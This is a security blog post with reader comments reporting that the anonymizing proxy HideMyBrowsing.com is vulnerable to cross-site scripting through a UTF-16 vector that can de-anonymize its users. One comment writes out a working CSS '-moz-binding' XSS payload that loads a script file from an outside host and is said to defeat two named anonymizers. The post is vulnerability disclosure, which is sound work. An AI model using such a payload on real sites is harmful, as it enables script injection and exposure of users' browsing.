Cenzic 232 Patent
Paid Advertising
web application security lab

HideMyBrowsing Vulnerable to XSS and De-anonymization

I’ve always loved CGI proxies because they have to deal with all the same problems that every other application has to deal with plus they have to try to force anything and everything that connects back to the remote machine into their pipe to proxy it. Alas, it’s just not that easy. HideMyBrowsing.com is designed to protect users from being seen by content filters. Firstly, how long will it take for content filters to block them? But even if you put that aside, and the obvious using their services to do malicious PHP injection, etc… they are still vulnerable.

The very first thing I tried was the UTF-16 vector. Normally they strip out JavaScript, and they do a fairly good job of it, but like all systems this complex they don’t anticipate everything, and as a result they are vulnerable to XSS. Normally that’s bad enough in of itself, but this time it’s worse. If the website uses UTF-16 they can force the user’s browser to connect back to the machine in question. Thereby de-anonymizing the user, making their viewing visible to content filters and running JavaScript on hidemybrowsing.com. Bad bad bad.

I’m sure it’s vulnerable to other vectors as well, that was just the first one I tried. So while interesting and vaguely clever usage of CGI, I wouldn’t use this if you could get fired for looking at porn at work.

6 Responses to “HideMyBrowsing Vulnerable to XSS and De-anonymization”

  1. Wladimir Palant Says:

    Yes, that’s worse than MySpace - these anonymizers have to sanitize CSS somehow in a way that won’t cripple the pages entirely. From the look of it they ignore the problem entirely: both hidemybrowsing.com and anonymizer.ru fail for a simple style=”-moz-binding: url(http://ha.ckers.org/xssmoz.xml#xss)”.

  2. Jeremiah Blatz Says:

    I’m sure there’s a java-based browser out there that’s moderately functional. Load that in an applet and have it proxy *all* communications through the anonymizing server. … that should work, right? I guess failing that you could just run the browser on the server and send imagemaps/applet vnc back to the user.

  3. James L Says:

    Are you sure you did not mean www.hidemybrowsing.info not .com?

    We are not using CGI Proxy or PHP Proxy.

    Thanks

    James

  4. RSnake Says:

    Hi, James, no, I’m not aware of hidemybrowsing.info (maybe they have the same flaw - I haven’t checked). I’m definitely referring to hidemybrowsing.com. I wasn’t intending to say you used PHP or any specific technology, but rather that this is essentially the same thing and they all suffer from the same problems.

    But for some reason I think the term “CGI” is wildly misunderstood. CGI only means “Common Gateway Interface”. It just means that some program is authorized to be run by anyone (it can be written in anything):
    http://hoohoo.ncsa.uiuc.edu/cgi/intro.html

  5. James L. Says:

    Can you send me the various flaws that you find the the web proxies out there? If I know about them then I am sure they can be fixed? Correct?

    James

  6. RSnake Says:

    James, I’ll just send you an email - we can take this offline.